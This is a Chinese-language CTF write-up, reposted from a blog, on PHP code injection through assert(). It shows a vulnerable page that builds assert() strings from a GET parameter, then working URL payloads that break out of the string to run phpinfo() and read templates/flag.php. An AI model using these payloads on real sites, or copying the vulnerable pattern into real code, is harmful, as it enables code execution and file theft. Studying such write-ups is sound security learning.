码迷,mamicode.com
首页 > 其他好文 > 详细

assert引起的代码注射

时间:2016-10-01 17:29:21      阅读:219      评论:0      收藏:0      [点我收藏+]

标签:

源自一道ctf题

<?php

if (isset($_GET[page])) {
    $page = $_GET[page];
} else {
    $page = "home";
}

$file = "templates/" . $page . ".php";
assert("strpos(‘$file‘, ‘..‘) === false") or die("傻了吧我的弟!");
assert("file_exists(‘$file‘)") or die("厉害了我的哥!");

?>
            <?php
                require_once $file;
            ?>

功能:1.page接收参数后组合成变量file。

   2.file经过滤..()防止目录遍历和判断文件是否存在

     3.包含文件

assert()简介:判断一个表达式是否成立。返回true or false。

当参数为字符串时,会被当作php代码执行。

例如 assert("phpinfo()")  <==>  <?phpinfo()?>

writeup:

通过可控变量file传入恶意参数,构造闭合 file_exists(),使assert()执行恶意代码

构造: /?page=123%27)%20or%20phpinfo();%23

  注意闭合‘  )  以及结尾;

关于此处的#:   #是单行注释,由assert("phpinfo()")  <==>  <?phpinfo()?>   可知,#的作用域仅仅是assert(函数内)

利用:/?page=123%27)%20or%20print_r(file_get_contents(%27templates/flag.php%27));%23

解释:file_get_contents把文件读入一个字符串中

最后,assert与eval的区别

assert把整个字符串参数当php代码执行,eval把合法的php代码执行。

 

assert引起的代码注射

标签:

原文地址:http://www.cnblogs.com/sn00py/p/5925944.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!